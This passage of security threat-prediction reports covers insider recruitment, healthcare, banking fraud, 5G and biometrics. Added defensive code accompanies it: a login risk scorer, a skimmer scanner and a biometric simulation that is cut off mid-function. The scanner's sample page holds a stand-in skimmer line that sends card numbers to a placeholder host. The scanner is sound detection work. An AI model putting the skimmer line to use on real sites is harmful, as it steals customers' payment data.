It’s also worth noting that when companies pass on their data to a cloud provider for storage or processing, they also need to consider whether the provider possesses the necessary level of cybersecurity. Even then, it is hard to be absolutely certain that the services they are paying for are really secure, as it requires a level of expertise in information security that not all technical officers possess.

  • Criminals will migrate to the cloud and forge ahead.

The increase in the availability of cloud services will allow not just companies but also attackers to deploy infrastructure in the cloud. This will reduce the complexity of an attack and, consequently, will increase their number and frequency. This could potentially affect the reputation of the cloud services themselves, as their resources will be used in large-scale malicious activity. To avoid this, providers will have to consider reviewing their security procedures and change their service policies and infrastructure.

Insider threat

The good news is that we are observing an increase in the overall level of security of businesses and organizations. In this regard, direct attacks on infrastructure (for example, penetrating the external perimeter through the exploitation of vulnerabilities) are becoming much more expensive, requiring more and more skills and time from the attacker. As a result, we predict:

  • Growth in the number of attacks using social engineering methods.

In particular, this means phishing attacks on company employees. As the human factor remains a weak link in security, the focus on social engineering will increase as other types of attacks become more difficult to carry out.

  • Growth of the insider market.

Due to the increasing cost of other attack vectors, attackers will be willing to offer large amounts of money to insiders. The price for insiders varies from region to region and depends on the target’s position in the company, the company itself, its local rating, the type and complexity of insider service that is requested, the type of data that is exfiltrated and the level of security at the company.

There are a number of ways such insiders can be recruited:

  • By simply posting an offer on forums and offering a reward for certain information.
  • The attackers may disguise their actions so that employees don’t realize they are acting illegally, disclosing personal information or engaging in insider activity. For example, the potential victims may be offered a simple job on the side to provide information, while being reassured that the data is not sensitive, though it may in fact relate to the amount of funds in a bank client’s personal account or the phone number of an intended target.
  • Blackmailing. We also expect to see increased demand for the services of groups engaged in corporate cyber-blackmail and, as a consequence, an increase in their activity.

Cyber-blackmailing groups that collect compromising info on company employees (e.g. evidence of crimes, personal records and personal data such as sexual preferences) for the purpose of blackmail will become more active too in the corporate sector. Usually this happens in the following way: the threat actors take a pool of leaked emails and passwords, find those that are of interest to them and exfiltrate compromising data that is later used for blackmail or cyberespionage. The stronger the cultural specifics and regional regulations, the faster and more effective the attackers’ leverage is. As a result, attacks on users in order to obtain compromising data are predicted to increase.

Cybersecurity of connected healthcare 2020: Overview and predictions

3 December, 2019 - 11:00

More than two years after the infamous Wannacry ransomware crippled medical facilities and other organizations worldwide, the healthcare sector seems to be learning its lesson, as the number of attacked medical devices – doctors’ computers, medical servers and equipment – in 2019 decreased globally.

Our statistics showed that from 30% of computers and devices in medical organizations being infected in 2017, this number dropped to 28% in 2018, and we detected almost a third fewer attacks for the current year (19%).

As much as we want to believe everybody has woken up to the dangers of attacks like Wannacry, we still witnessed a number of ransomware attacks against healthcare facilities in several countries. There are two key reasons for such cyberattacks: a lack of attention to the risks of digitalization and a lack of cybersecurity awareness among staff at medical facilities.

Our conclusions about the human factor in cybersecurity are drawn from survey results. Kaspersky conducted a survey among healthcare sector employees in the US and Canada that revealed nearly a third of all respondents (32%) had never received any cybersecurity training from their workplace.

One-in-10 employees in management positions also admitted that they were unaware of a cybersecurity policy in their organization.

Another serious issue is the lack of proper security standards implemented in medical IoT devices. Throughout the year security researchers identified a number of vulnerabilities in different medical equipment. Hopefully, drawing attention to this subject will make manufacturers collaborate with the security community and contribute more to the creation of a safer environment in the world of smart medicine.

Forecast 2020

  • Interest in medical records on the dark web will grow. From our research into underground forums we see that such records are sometimes even more expensive than credit card information. It also opens up potentially new methods of fraud: armed with someone’s medical details it’s easier to scam the patient or his/her relatives.
  • Access to internal patient info makes it possible not only to steal but to modify records. This can lead to targeted attacks on individuals in order to mess up diagnostics. Diagnostic mistakes are the number one reason for patient deaths in the medical field according to statistics (even ahead of poorly qualified medical personnel).
  • The number of attacks on medical facility devices in countries that are just starting the digitalization process in the field of medical services will grow significantly next year. We expect to see the emergence of targeted ransomware attacks against hospitals in developing countries. Medical institutions are turning into industrial infrastructures. Loss of access to internal data (e.g. digital patient records) or internal resources (e.g. connected medical equipment inside a hospital) can halt patient diagnostics and even disrupt emergency aid.
  • Growing numbers of targeted attacks against medical research institutes and pharmaceutical companies conducting innovative research. Medical research is extremely expensive and some APT groups that are specialized in intellectual property theft will attack such institutions more frequently in 2020.
  • Thankfully, we’ve never seen attacks on implanted medical devices (e.g. neuro-stimulators) in the wild. But the fact that there are numerous security vulnerabilities in such devices means that it’s just a matter of time. The creation of centralized networks of wearable and implanted medical devices (as in the case of cardio stimulators) will lead to the emergence of a new threat: a single point of entry to attack all the patients using such devices.

Cyberthreats to financial institutions 2020: Overview and predictions

3 December, 2019 - 11:00

Key events 2019

  • Large-scale anti-fraud bypass: Genesis digital fingerprints market uncovered
  • Multi-factor authentication (MFA) and biometric challenges
  • Targeted attack groups specializing in financial institutions: splitting and globalization
  • ATM malware becomes more targeted
  • Card info theft and reuse: magecarting everywhere and battle of POS malware families in Latin America

Large-scale anti-fraud bypass: Genesis digital fingerprints market uncovered

During the last few years, cybercriminals have invested a lot in methods to bypass anti-fraud systems, because now it’s not enough just to steal the login, password and PII – they now need a digital fingerprint to bypass anti-fraud systems in order to extract money from the bank. During 2019, we identified a huge underground market called Genesis, which sells digital fingerprints of online banking users from around the globe.

From an anti-fraud system perspective, the user’s digital identity is a digital fingerprint – a combination of system attributes that are unique to each device, and the personal behavioral attributes of the user. It includes the IP address (external and local), screen information (screen resolution, window size), firmware version, operating system version, browser plugins installed, time zone, device ID, battery information, fonts, etc. The device may have over 100 attributes used for browsing. The second part of a digital identity is the behavioral analysis.

As criminals are continuously looking for ways to defeat anti-fraud safeguards, they try to substitute the system’s real fingerprint with a fake one, or with existing ones stolen from someone else’s PC.

The Genesis Store is an online invitation-only private cybercriminal market for stolen digital fingerprints. At the time of our research, it offered more than 60 thousand stolen bot profiles. The profiles include browser fingerprints, website user logins and passwords, cookies, credit card information, etc. By uploading this fingerprint to the Tenebris Linken Sphere browser, criminals are able to masquerade as legitimate online banking users from any region, country, state, city, etc.

This type of attack shows that criminals have in-depth knowledge of how internal banking systems work and it’s a real challenge to protect against such attacks. The best option is to always use multi-factor authentication.
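As an added illustration (not Securelist's code): a toy anti-fraud scorer in JavaScript showing why an exact fingerprint match should not be trusted on its own. A replayed profile matches the stored attributes perfectly, while network context and the behavioural component still diverge, which is what drives the step-up to MFA. Attribute names, weights, thresholds and the sample profiles are constructed assumptions.

```javascript
// Added example, not Securelist's code. Attribute names, weights,
// thresholds and the sample profiles below are constructed assumptions.

// System attributes that make up the stored device fingerprint.
const FINGERPRINT_KEYS = [
  "screen", "timezone", "os", "browserVersion", "plugins", "fonts", "deviceId",
];

// Return the fingerprint attributes whose value differs between the stored
// profile and the attributes observed at login.
function fingerprintDiff(stored, current) {
  return FINGERPRINT_KEYS.filter(
    (k) => JSON.stringify(stored[k]) !== JSON.stringify(current[k]),
  );
}

// Score a login attempt. A perfect fingerprint match is not treated as proof
// of identity: a stolen profile replays the victim's attributes exactly, so
// network context and the behavioural component still contribute.
function scoreLogin(stored, current) {
  const changed = fingerprintDiff(stored, current);
  const reasons = [];
  let score = 0;

  // A few natural changes (browser update, new plugin) should not lock the
  // legitimate user out, so each changed attribute adds only a little.
  if (changed.length > 0) {
    score += changed.length * 10;
    reasons.push(`fingerprint attributes changed: ${changed.join(",")}`);
  }
  // Network context: an identical device seen from a new country or ASN is
  // the pattern of a replayed fingerprint.
  if (stored.network.country !== current.network.country) {
    score += 40;
    reasons.push("country changed");
  }
  if (stored.network.asn !== current.network.asn) {
    score += 15;
    reasons.push("ASN changed");
  }
  // The timezone the browser reports should agree with IP geolocation.
  if (current.timezone !== current.network.expectedTimezone) {
    score += 25;
    reasons.push("browser timezone disagrees with IP geolocation");
  }
  // Behavioural component: typing cadence far from this user's baseline.
  const cadenceDelta = Math.abs(
    current.behaviour.keyIntervalMs - stored.behaviour.keyIntervalMs,
  );
  if (cadenceDelta > 60) {
    score += 20;
    reasons.push("typing cadence outside baseline");
  }

  let decision = "allow";
  if (score >= 60) decision = "step-up-mfa";
  else if (score >= 30) decision = "review";
  return { score, decision, reasons };
}

// Constructed profile of a legitimate user, as an anti-fraud system might
// store it after several routine sessions.
const storedProfile = {
  screen: "1920x1080", timezone: "Europe/Berlin", os: "Windows 10",
  browserVersion: "79.0", plugins: ["pdf"], fonts: 212, deviceId: "dev-0001",
  network: { country: "DE", asn: 3320, expectedTimezone: "Europe/Berlin" },
  behaviour: { keyIntervalMs: 140 },
};

// Same user after a browser update, from the usual network: low risk.
const routineLogin = { ...storedProfile, browserVersion: "80.0" };

// Device attributes replayed exactly, but from another country and ASN,
// with a different person at the keyboard.
const replayedLogin = {
  ...storedProfile,
  network: { country: "BR", asn: 26599, expectedTimezone: "America/Sao_Paulo" },
  behaviour: { keyIntervalMs: 230 },
};

console.log(scoreLogin(storedProfile, routineLogin));  // score 10, allow
console.log(scoreLogin(storedProfile, replayedLogin)); // score 100, step-up-mfa
```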

Multi-factor authentication (MFA) and biometric challenges

MFA is a challenge for cybercriminals. When MFA is used, they have to come up with techniques to bypass it. The most common methods used during the last year were:

  • Exploiting vulnerabilities and flaws in the configuration of the system. For example, criminals were able to find and exploit several flaws in remote banking systems to bypass OTPs (one time passcodes);
  • Using social engineering, a common method among Russian-speaking cybercriminals and in the APAC region;
  • SIM swapping, which is especially popular in regions like Latin America and Africa. In fact, despite SMS no longer being considered a secure 2FA, low operational costs mean it’s the most popular method used by providers.

In theory, biometrics should solve a lot of problems associated with two-factor authentication, but practice has shown that it may not be so simple. Over the past year, several cases have been identified that indicate biometrics technology is still far from perfect.

Firstly, there are quite a few implementation problems. For example, Google Pixel 4 does not check if your eyes are open during the unlocking process using facial characteristics. Another example is the possibility of bypassing fingerprint authentication using the sensor under the screen on smartphones made by various manufacturers, including popular brands such as Samsung.

There is another trick that has been exploited in Latin America: a visual capturing attack. Cybercriminals installed rogue CCTV cameras and used them to record the PINs people used to unlock their phones. Such a simple technique is still very effective for both types of victims: those who use biometrics and those who prefer PINs to fingerprints or facial recognition. This is because, when a device is dusty or greasy (and the same applies to a user’s fingers), the best way to unlock a phone is to use a PIN.

Secondly, there were several high-profile leaks of biometric databases. The most notorious was the leak of the Biostar 2 database that included the biometric data of over 1 million people. The company stored unencrypted data, including names, passwords, home addresses, email addresses and, most importantly, unencrypted biometric data that included fingerprints and facial recognition patterns as well as the actual photos of faces. A similar leak occurred at a US Customs and Border Patrol contractor, where biometric information of over 100,000 people was leaked.

There have already been several proof-of-concept attacks that use biometric data to bypass security controls, but those attacks could still be countered with system updates. With these latest leaks, on the other hand, this won’t work because your biometric data cannot be changed – it stays with you forever.

The cases mentioned above, combined with the high-quality research carried out by cybercriminals to obtain a complete digital fingerprint of a user in order to bypass anti-fraud systems, suggest that relying solely on biometric data will not solve the current problems. Today’s implementations need a lot of effort and more research to make them truly secure.

Targeted attack groups specializing in financial institutions: splitting and globalization

FIN7

In 2018, Europol and the US Department of Justice announced the arrest of the leader of the FIN7 and Carbanak/CobaltGoblin cybercrime groups. Some believed that the arrest would have an impact on the group’s operations, but this does not seem to have been the case. In fact, the number of groups operating under the umbrella of CobaltGoblin and FIN7 has grown: there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks.

The first operating under this umbrella is the now-notorious FIN7 that specializes in attacking various companies to get access to financial data or their PoS infrastructure. It relies on the Griffon JScript backdoor and Cobalt/Meterpreter and, in more recent attacks, PowerShell Empire.

The second is CobaltGoblin/Carbanak/EmpireMonkey. It uses the same toolkit, techniques and a similar infrastructure, but targets only financial institutions and associated software and service providers.

The final group is the newly discovered CopyPaste group, which has targeted financial entities and companies in one African country – leading us to believe that this group is associated with cyber-mercenaries or a training center. The links between CopyPaste and FIN7 are still very weak. It’s possible that the operators of this cluster of activity were influenced by open-source publications and don’t actually have any ties to FIN7.

All of these groups benefit greatly from unpatched systems in corporate environments and continue to use effective spear-phishing campaigns in conjunction with well-known Microsoft Office exploits generated by their exploitation framework. So far, the groups have not used any zero-day exploits. FIN7/Cobalt phishing documents may seem basic, but when combined with their extensive social engineering and focused targeting, they have proved to be quite successful.

In the middle of 2019, FIN7 fell silent, but returned at the end of the year with new attacks and new tools. We suspect that the silent period is connected to their infrastructure shutdown that occurred after closing a bulletproof hosting company in Eastern Europe.

In contrast to FIN7, the activity of the Cobalt Goblin Group was stable throughout the year, which once again proves that these groups are connected, but operate on their own: their toolsets and TTPs are very similar, but operate independently; and only occasionally can we spot overlaps in infrastructure. At the same time, the intensity of attacks is slightly lower than in 2018. Cobalt Goblin’s tactics have remained the same: they use documents with exploits that first load a small downloader and then a Cobalt beacon. The main targets also remain the same: small banks in a variety of countries. Perhaps we have detected a lower number of attacks due to diversification, because some indicators suggest the group could also be engaging in JS sniffing (MageCarting) in order to obtain data about payment cards directly from websites.

JS sniffing was extremely popular throughout the year and we found thousands of e-commerce websites infected with these scripts. The injected scripts act in different ways and the infrastructure of the attackers is very different, which suggests that this type of fraud is used by at least a dozen cybercrime groups.

The Silence group actively expanded its operations into different countries throughout the year. We detected attacks in regions where we have never seen them before. For example, we recorded attacks in Southeast Asia and Latin America. This indicates that they have either expanded their operations themselves or started cooperating with other regionally installed cybercrime groups. However, when we look at the development of their main backdoor, we see that their technologies have barely changed over the last two years.

ATM malware becomes more targeted

When it came to ATM malware, we discovered a number of completely new families in 2019. The most notable were ATMJadi and ATMDtrack.

ATMJadi is an interesting one because it doesn’t use the standard XFS, JXFS or CSC libraries. Instead, it uses the proprietary Java classes of the victim bank’s own ATM software, meaning the malware will only work on a small subset of ATMs. This makes the malware very targeted (towards one specific bank).

This is reminiscent of the FASTCash case from 2018, when criminals targeted servers running AIX OS. With a decrease in the number of general-purpose cashout tools, we can say that ATM malware is becoming rarer and more targeted.

Another interesting piece of malware is ATMDtrack, which was first detected in financial institutions in India and is programmed to cash out ATMs. Using the Kaspersky Targeted Attack Attribution Engine (KTAE), we were able to attribute these attacks to the Lazarus group, which supports our prediction from 2018 that there will be “more nation-state sponsored attacks against financial organizations”. Moreover, similar spyware has been found in research centers, with the Lazarus APT group using almost identical tools to steal research results from scientific institutes.

Card info theft and reuse

During the year we saw a lot of malware targeting end users and businesses looking for credit card data. In Brazil, in particular, we saw a couple of malware families fighting it out between themselves to maintain control of infected devices. HydraPOS and ShieldPOS were very active during the year, with new versions that included a lot of new targets; Prilex, meanwhile, reduced its activities in the second half of the year.

ShieldPOS has been active since at least 2017 and, after being malware only, it has finally evolved into a MaaS (malware-as-a-service). This fact shows there’s great interest from Latin American cybercriminals in running their own “business” to steal credit cards. HydraPOS has been mostly focused on stealing money from POS systems in restaurants, parking slot machines and different retail stores.

Compared to ShieldPOS, HydraPOS is an older campaign from an actor we named Maggler, which has been in the credit card business since at least 2016. The main difference is that, unlike ShieldPOS, it doesn’t work as MaaS. In both cases, we suspect that the initial infection vector is a carefully prepared social engineering campaign involving telephone calls to the victims.

Analysis of forecasts for 2019

Before giving our forecasts for 2020, let’s see how accurate our forecasts for 2019 turned out to be:

The emergence of new groups due to the fragmentation of Cobalt/Carbanak and FIN7: new groups and new geography.

  • Yes, we saw CobaltGoblin activity, FIN7 activity, CopyPaste activity and IoC overlaps with the Silence group.

The first attacks through the theft and use of biometric data.

  • Yes, hacking of various biometric databases regularly appeared throughout the year. We also revealed a digital fingerprint market where criminals can buy digital fingerprints, which include, among other things, behavioral data (a component of biometrics).

The emergence of new local groups attacking financial institutions in the Indo-Pakistan region, Southeast Asia and Central Europe.

  • No. It turned out that well-known groups such as Lazarus, Silence and CobaltGoblin took their place and very actively attacked financial institutions in these regions.

Continuation of supply-chain attacks: attacks on small companies that provide their services to financial institutions around the world.

  • Yes.

Traditional cybercrime will focus on the easiest targets and bypass anti-fraud solutions: replacement of POS attacks with attacks on systems accepting online payments (Magecarting/JS skimming).

  • Yes, the number of groups that started carrying out attacks on online payment systems grew constantly over the year. We detected thousands of websites that were affected by JS skimming.

The cybersecurity systems of financial institutions will be bypassed using physical devices connected to the internal network.

  • Yes, and not only in financial institutions but even the aerospace industry, namely NASA, has suffered from this type of attack.

Attacks on mobile banking for business users.

  • No.

Advanced social engineering campaigns targeting operators, secretaries and other internal employees in charge of wire transfers.

  • Yes, BEC (business email compromise) attacks have been on the rise worldwide. We have seen major attacks in Japan, while there have also been campaigns in South America, particularly in Ecuador.
  • Additionally, advanced social attacks have been actively used in Brazil to make POS operators go to a malicious website to download specially crafted remote control modules and run them, for example, in HydraPOS attacks.

Forecast 2020

Attacks against Libra and TON/Gram

The successful launch of cryptocurrencies such as Libra and Gram might lead to the worldwide spread of this type of asset, which naturally will attract the attention of criminals. Given the serious surge in cybercriminal activity during the rapid growth of Bitcoin and altcoins in 2018, we predict that a similar situation will most likely unfold around Gram and Libra. Large players in this market should be especially careful, as there are a number of APT groups, such as WildNeutron and Lazarus, whose interests include crypto assets. They are very likely to exploit these developments.

Reselling bank access

During 2019, we witnessed cases where groups who specialize in targeted attacks on financial institutions appeared in the victims’ networks after intrusions by other groups that specialize in selling RDP/VNC access, such as FXMSP and TA505. These facts are also confirmed by underground forum and chat monitoring.

In 2020, we expect an increase in the activity of groups specializing in the sale of network access in the African and Asian regions, as well as in Eastern Europe. Their prime targets are small banks, as well as financial organizations recently bought by big players who are rebuilding their cybersecurity system in accordance with the standards of their parent companies.

Ransomware attacks against banks

This forecast logically follows from the previous one. As mentioned above, small financial institutions often become the victims of opportunistic cybercriminals. If these criminals cannot resell access, or even if it becomes less likely that they will be able to withdraw money, then the most logical monetization of such access is ransomware. Banks are among those organizations that are more likely to pay a ransom than accept the loss of data, so we expect the number of such targeted ransomware attacks to continue to rise in 2020.

Another ransomware attack vector against small and medium financial institutions will be a “pay-per-install” scheme. Traditional botnets will eventually turn into increasingly popular delivery mechanisms against those financial institutions.

2020: the return of custom tooling

Measures taken by antivirus products to effectively detect open source tools used for pen testing purposes, and the adoption of the latest cyberdefense technologies, will push cybercrime actors to return to custom tooling in 2020 and also invest in new Trojans and exploits.

Global expansion of mobile banking Trojans: result of leaked source

Our research and monitoring of underground forums suggests that the source code of some popular mobile banking Trojans was leaked into the public domain. Given the popularity of such Trojans, we expect a repeat of the situation when the source code of the ZeuS and SpyEye Trojans was leaked: the number of attempts to attack users will increase many times over, and the geography of attacks will expand to almost every country in the world.

Investment apps on the rise: new target for criminals

Mobile investment apps are becoming more popular among users around the globe. This trend won’t go unnoticed by cybercriminals in 2020. Given the popularity of some fintech companies and exchanges (for both real and virtual money), cybercriminals will realize that not all of them are prepared to deal with massive cyberattacks, as some apps still lack basic protection for customer accounts, and do not offer two-factor authentication or certificate pinning to protect app communication. Several governments are deregulating this area and new players are appearing every day, becoming popular very quickly. In fact, we have already seen attempts by cybercriminals to substitute the interfaces of these apps with their own malicious versions.

Magecarting 3.0: even more attacker groups and cloud apps to become prime targets

Over the past couple of years, JS skimming has gained immense popularity among attackers. Unfortunately, cybercriminals now have a huge attack surface that consists of vulnerable e-commerce websites and extremely cheap JS skimmer tools available for sale on various forums, starting at $200. At the moment we are able to distinguish at least 10 different actors involved in these types of attacks and we believe that their number will continue to grow during the next year. The most dangerous attacks will be on companies that provide services such as e-commerce as a service, which will lead to the compromise of thousands of companies.
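As an added example (not Securelist's or any vendor's code) for both the JS sniffing discussion above and this section: a small Node.js scanner that checks a checkout page, as served to customers, for scripts from origins outside an allowlist, allowed third-party scripts without Subresource Integrity, and inline scripts that both read card fields and send data out. The sample page, the allowlist and the heuristics are constructed assumptions.

```javascript
// Added example, not Securelist's or any vendor's code. The allowlist, the
// heuristics and the sample page below are constructed assumptions.

// Origins the shop legitimately loads scripts from (constructed).
const ALLOWED_SCRIPT_ORIGINS = new Set([
  "https://shop.example",
  "https://cdn.example",
]);

// What a skimmer has to do: read payment fields and send them somewhere.
const CARD_FIELD_RE = /\b(card ?number|cc[-_]?num|cvv|cvc|expir[a-z]*|cardholder)\b/i;
const EXFIL_RE = /\b(fetch|XMLHttpRequest|sendBeacon|new Image)\b|\.src\s*=/;
const URL_RE = /https?:\/\/[^\s'"`)]+/g;

function originOf(url) {
  try {
    return new URL(url).origin;
  } catch {
    return null; // relative path, i.e. same-origin
  }
}

// Pull every <script> out of the page as { src, integrity, body }.
function extractScripts(html) {
  const scripts = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const attrs = m[1];
    const srcMatch = attrs.match(/\bsrc\s*=\s*["']([^"']+)["']/i);
    scripts.push({
      src: srcMatch ? srcMatch[1] : null,
      integrity: /\bintegrity\s*=/i.test(attrs),
      body: m[2],
    });
  }
  return scripts;
}

// Report scripts from unexpected origins, allowed third-party scripts
// without Subresource Integrity, and inline scripts that look like skimmers.
function scanCheckoutHtml(html) {
  const findings = [];
  for (const s of extractScripts(html)) {
    if (s.src !== null) {
      const origin = originOf(s.src);
      if (origin === null) continue; // same-origin relative path
      if (!ALLOWED_SCRIPT_ORIGINS.has(origin)) {
        findings.push({ kind: "unexpected-script-origin", detail: s.src });
      } else if (!s.integrity) {
        findings.push({ kind: "missing-sri", detail: s.src });
      }
    } else if (CARD_FIELD_RE.test(s.body) && EXFIL_RE.test(s.body)) {
      // Literal URLs in the inline script that point outside the allowlist.
      const targets = (s.body.match(URL_RE) || [])
        .map(originOf)
        .filter((o) => o !== null && !ALLOWED_SCRIPT_ORIGINS.has(o));
      findings.push({
        kind: "inline-skimmer-pattern",
        detail: targets.join(",") || "(no literal URL; check for obfuscation)",
      });
    }
  }
  return findings;
}

// Constructed checkout page: one allowed script with SRI, one allowed script
// without, one script from an origin that is not on the allowlist, and an
// inline stand-in for an injected skimmer.
const SAMPLE_CHECKOUT_HTML = `
<html><body>
<form id="payment"><input name="cardnumber"><input name="cvv"></form>
<script src="https://cdn.example/lib/ui.js" integrity="sha384-CONSTRUCTED"></script>
<script src="https://shop.example/js/checkout.js"></script>
<script src="https://static.analytics-cdn.example/a.js"></script>
<script>
  document.querySelector('#payment').addEventListener('submit', function () {
    var d = document.querySelector('[name=cardnumber]').value;
    new Image().src = 'https://stats-collector.example/i.gif?d=' + btoa(d);
  });
</script>
</body></html>`;

for (const f of scanCheckoutHtml(SAMPLE_CHECKOUT_HTML)) {
  console.log(f.kind, f.detail);
}
```

Run against a stored copy of the page on a schedule and diff the findings: a new origin or a new inline-skimmer hit is the alert, since a compromised page usually changes only in the script tags.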

Political instability leading to the spread of cybercrime in specific regions

Some countries are experiencing political and social upheaval, resulting in masses of people seeking refugee status in other countries. These waves of immigration include all sorts of people, including cybercriminals. This phenomenon will result in the spread of geographically localized attacks in countries that have not previously been affected by them.

5G technology predictions 2020

3 December, 2019 - 11:00

It is estimated that data will reach 175 zettabytes worldwide by 2025, up from 1.2 zettabytes in 2010, when 4G was first being deployed globally. 5G is known as the fifth generation cellular network technology. It is expected to be as much as 100 times faster than the present 4G systems, with up to 25 times lower latency or lag time, and as many as one million devices supported within one square kilometer. The foundation of 5G can be summarized in five technologies: millimeter waves, small cell networks, massive MIMO (multiple input multiple output), beamforming, and full duplex.

With the dramatic increase in the amount and transfer speed of connected devices comes a natural expansion and amplification of the threats. The evolution, development and connectivity of numerous systems within 5G opens the door to numerous threats, which can be summarized as follows.

Vulnerabilities of telco services and infrastructure

As 5G innovations spread, more shortcomings and flaws will show up in 5G equipment, customer systems and their administration by operators. This could enable an attacker to damage or bring down a telco infrastructure, spy on its clients or divert its traffic. Governments need to set up nationwide capabilities that apply objective, specialized verification techniques to evaluate both 5G adopters and suppliers, to discover faults and stipulate fixes.

User safety and privacy concerns

On the privacy side, matters become more complex. The advent of 5G, with its short range, will mean many more cell communication towers being deployed in commercial centers and buildings. With the right toolset, someone could collect and track the precise location of users. Another issue is that 5G service providers will have extensive access to the large amounts of data sent by user devices, which could show exactly what is happening inside a user’s home and, at the very least, describe via metadata their living environment, in-house sensors and parameters. Such data could expose a user’s privacy or could be manipulated and misused. Service providers may also consider selling such data to other companies, such as advertisers, in an attempt to open up new revenue streams. In some cases, vulnerabilities could cause injuries or ill health, for instance if a client’s medical devices are disconnected and stop operating. The potential threats will be even greater when critical infrastructure components, such as water and energy equipment, are put at risk.

Critical infrastructure expansion and risks

5G will extend communications to a larger number of geographical areas than at present. It will also give devices that could not previously be networked remote monitoring and control. However, as the number of such connected systems grows, they will no longer count as non-critical infrastructure, expanding our exposure to risk. People are being enticed to adopt convenience and non-stop communications, but the related threats could pose public safety risks.

Action plan

5G is going to have a revolutionary impact on telecommunications because, in addition to the technology itself, it is going to become a basis for other technologies and inventions, enabling advances particularly in the fields of smart cities, intelligent power grids and defense facilities. It is the next generation of cellular network, building on the existing 4G LTE while also opening up the millimeter wave band. 5G will be able to accommodate more network-connected devices and considerably increase speeds for all users.

However, as with every major technology, especially while it is evolving, 5G is likely to draw the attention of threat actors looking for opportunities to attack it. We may, for instance, see large-scale DDoS attacks, or challenges in terms of protecting a sophisticated network of connected devices whereby the compromise of one device can lead to a whole network crashing. In addition, 5G is developing technology on top of the previous infrastructure, which means it will inherit the vulnerabilities and misconfigurations of its predecessor.

Furthermore, the communication trust model will not be identical to previous cellular generations. IoT and M2M devices are expected to occupy a greater portion of the network capacity, and the interaction of all these devices in the 5G network will likely reveal previously unknown issues in product design and device behavior. Given these concerns and the additional political disputes, adopting a zero-trust network model together with strict product quality assessment and compliance would help build trust between technology adopters and providers.

Government and industry leaders should join forces to promote secure and safe 5G technology projects that enhance services and the quality of life for citizens of smart cities. High-tech vendors and governmental structures should likewise cooperate to prevent the exploitation of 5G by threat actors and to preserve its innovative potential for technical progress and better living conditions.

Biometric data processing and storage system threats

2 December, 2019 - 16:00

Initially, digital biometric data processing systems were used primarily by government agencies and special services (police, customs, etc.). However, the rapid evolution of information technology has made biometric systems accessible for ‘civil’ use. They are increasingly becoming part of our everyday lives, augmenting and replacing traditional authentication methods, such as those based on logins and passwords. Indeed, identifying people using characteristics that are unique to each person, such as fingerprints, voices, facial shapes or their distinctive eye structure, seems an obvious and incredibly convenient method.

Today, biometric authentication is used to access government and commercial offices, industrial automation systems, corporate and personal laptops and mobile phones. Both the number and the variety of applications for these technologies continues to grow.

Unfortunately, like many other technologies that have been rapidly evolving lately, biometric authentication systems have proved to have significant drawbacks. The key shortcomings of biometric authentication technologies have to do with information security issues.

In this report, we will discuss the numerous information security issues affecting biometric authentication systems and present the results of our own research, to provide additional information for a more objective evaluation of risks associated with using existing biometric authentication system implementations.

Biometric data processing and storage

The concept of biometric data as a unique personal identifier that cannot be forged is fundamentally wrong and can foster a false sense of security.

Firstly, the accuracy of biometric data recognition by authentication systems, although relatively high, can still be insufficient for many applications. After all, such recognition is not about simply calculating whether two hash sums are equal or not, as in the case of password-based authentication. Biometric systems usually have a greater-than-zero probability of false-negative and false-positive results.

Secondly, research demonstrates that many human biometric characteristics can be forged (falsified) by malicious actors, and copying digitized biometric data may be even easier than copying physical biometrics.

Thirdly (and most importantly), biometric data, once compromised, is compromised for good: users cannot change their stolen fingerprints the way they do stolen passwords. What’s more, biometric data may turn out to be compromised for all applications at the same time. An individual will therefore potentially be affected for the rest of his or her life.

Given all of the issues above, it is remarkable how careless biometric authentication system developers and users are about protecting these systems and the biometric data collected by them against computer attacks.

It turns out that biometric data may be stored in a format that is easily accessible to attackers. A striking example is the notorious story of a major breach found in BioStar 2, a web-based biometric security smart lock platform. According to researchers, the service had a publicly accessible database – over 27.8 million records, a total of 23 gigabytes of data on employees within 5,700 organizations, from 83 countries. The database contained, among other confidential data, about one million fingerprint records, as well as facial recognition information. According to the report, “…instead of saving a hash of the fingerprint (that can’t be reverse-engineered) they are saving people’s actual fingerprints that can be copied for malicious purposes.”
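To make the points above concrete, here is an added Python simulation (not code from the report, and not modelling any real template format) of why a fingerprint template cannot be verified like a password hash, and why a threshold matcher always has non-zero false reject and false accept rates. It assumes constructed 64-bit feature vectors with a per-bit sensor-noise rate of 0.25, chosen only so that the two error rates are both visible at this scale.

```python
"""Added example, not code from the Securelist report.

A 'template' is a constructed 64-bit vector standing in for a feature vector
derived from a fingerprint. A repeat 'scan' of the same finger is the enrolled
vector with random bits flipped, which models sensor noise. No real biometric
template format is modelled here."""
import hashlib
import random
from typing import List, Tuple

BITS = 64      # constructed template length (assumption)
NOISE = 0.25   # per-bit flip probability between two captures of one finger (assumption)


def enroll(rng: random.Random) -> List[int]:
    """Constructed enrolled template: uniformly random bits."""
    return [rng.randint(0, 1) for _ in range(BITS)]


def rescan(template: List[int], rng: random.Random, noise: float = NOISE) -> List[int]:
    """A fresh capture of the same finger: each bit flips independently with probability `noise`."""
    return [bit ^ (rng.random() < noise) for bit in template]


def template_hash(template: List[int]) -> str:
    return hashlib.sha256(bytes(template)).hexdigest()


def hash_match(enrolled: List[int], probe: List[int]) -> bool:
    """Password-style check: succeeds only if the probe is bit-for-bit identical.
    A noisy biometric capture is essentially never identical, so this cannot work."""
    return template_hash(enrolled) == template_hash(probe)


def hamming(a: List[int], b: List[int]) -> int:
    return sum(x != y for x, y in zip(a, b))


def threshold_match(enrolled: List[int], probe: List[int], threshold: int) -> bool:
    """What a real matcher has to do: accept if the probe is 'close enough' to the
    stored template. This is why the template itself (not a hash) must be stored
    and therefore protected."""
    return hamming(enrolled, probe) <= threshold


def flip_one_bit(template: List[int], index: int = 0) -> List[int]:
    """Deterministic one-bit disturbance, used to show the hash comparison breaking."""
    probe = list(template)
    probe[index] ^= 1
    return probe


def error_rates(threshold: int, n_users: int = 200, seed: int = 7) -> Tuple[float, float]:
    """Estimate (FRR, FAR) for a decision threshold over a constructed population.

    FRR: share of genuine users rejected on a repeat scan of their own finger.
    FAR: share of impostor attempts accepted (a scan of user i+1's finger is
         presented against user i's template).
    The seed fixes the population, so between calls only the threshold changes."""
    rng = random.Random(seed)
    templates = [enroll(rng) for _ in range(n_users)]
    genuine_probes = [rescan(t, rng) for t in templates]
    impostor_probes = [rescan(templates[(i + 1) % n_users], rng) for i in range(n_users)]
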